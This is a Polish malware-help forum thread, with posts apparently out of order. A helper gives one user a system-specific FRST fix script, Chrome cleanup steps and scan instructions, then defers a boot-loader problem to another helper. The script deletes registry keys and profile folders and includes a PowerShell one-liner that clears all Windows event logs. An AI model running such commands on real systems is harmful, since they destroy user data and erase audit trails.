Improvement -> Brak pliku C:\Users\Irena\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Irena\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Irena\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Irena\AppData\Local\Mozilla C:\Users\Irena\AppData\Roaming\Mozilla C:\Users\Irena\AppData\Roaming\Profiles Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt 3. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Temat zostanie przeniesiony do działu Pomocy doraźnej, gdyż dotyczy tematyki malware. Podobny temat: KLIK. W raportach brak oznak infekcji, nie wykluczone, że to był tylko "reklamowy straszak", aczkolwiek widoczny jest wzrost takich przypadków. Do spoilera zadaję działania kosmetyczne do wykonania (kasacja martwych wpisów / resztek po oprogramowaniu / czyszczenie zanieczyszczonego pliku Hosts / usunięcie Proxy*): * jeśli proxy jest ustawione celowo to proszę usunąć ze skryptu linijkę RemoveProxy:

Świetnie (ja już też zacząłem kombinować z ręczną odbudową, a tu taka miła niespodzianka!). Tamtych kroków nie wykonuj! Proszę o pełny zestaw raportów FRST (FRST, Addition, Shortcut). Tej infekcji z loaderem nie będę ruszać i zobaczę tylko w jakim jest stanie. Czy reklamy w przeglądarce ustąpiły (pytam, byśmy mieli klarowną sytuację)?

Dobrze. Wiemy już raczej wystarczająco. Nie podejmuj żadnych działań, by nie namieszać. Myślę, że picasso odpowie jak najszybciej będzie mogła. Poczekajmy proszę teraz na picasso, jak już mówiłem poinformowałem ją, wolę niczego nie robić już tu na własną rękę.

Hm... No nic poczekamy na picasso to się dowiemy. Masz płytę Windows, więc będziemy mieli dostęp do WinRe. Nie jesteśmy na szczęście w czarnej kropce (Windows przypuszczalnie nie wie, którego loadera ma użyć - i to będzie trzeba ustawić, ale jak mówię: wolę poczekać na picasso).